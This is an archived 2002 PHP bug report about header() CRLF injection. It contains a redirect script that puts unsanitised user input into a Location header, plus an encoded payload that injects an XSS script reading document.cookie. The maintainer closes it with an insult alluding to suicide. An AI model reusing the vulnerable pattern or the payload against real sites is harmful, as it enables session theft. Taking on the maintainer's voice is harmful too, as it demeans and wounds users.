#19286 [Opn->Bgs]: header() Control Char Injection

From: Date: Sun, 08 Sep 2002 02:44:09 +0000
Subject: #19286 [Opn->Bgs]: header() Control Char Injection
References: 1  Groups: php.bugs 
Request: Send a blank email to php-bugs+get-18652@lists.php.net to get a copy of this message
ID: 19286 Updated by: sniper@php.net Reported By: mattmurphy@kc.rr.com -Status: Open +Status: Bogus Bug Type: Output Control Operating System: Win32 PHP Version: 4.2.3 New Comment: Have you ever thought of shooting yourself? You can also pass user input to fopen()..or exect() (that's really for the brave ones to try..) Previous Comments: ------------------------------------------------------------------------ [2002-09-07 16:14:22] mattmurphy@kc.rr.com I made a quite primitive use of the header() function in a redirect script: <?php if (isset($_GET["url"])) { header("Location: " . $_GET["url"]); } ?> But, no imagine for a second: url=http%3A%2F%2Fwww.yahoo.com%2F%0D%0A%0D%0A%3Cscript%3Ealert%28document.cookie%29%3B%3C%2FSCRIPT%3E%0D%0A%0D%0A Which causes: Location: http://www.yahoo.com/ <script>alert(document.cookie)</script> Another interesting thing about this is that it (possibly) allows bypassing output buffering(?). If nothing else, this is a documentation problem, as the header() docs say that it will modify a single header, but it also allows body content to be manipulated. ------------------------------------------------------------------------ -- Edit this bug report at http://bugs.php.net/?id=19286&edit=1

« previous php.bugs (#18652) next »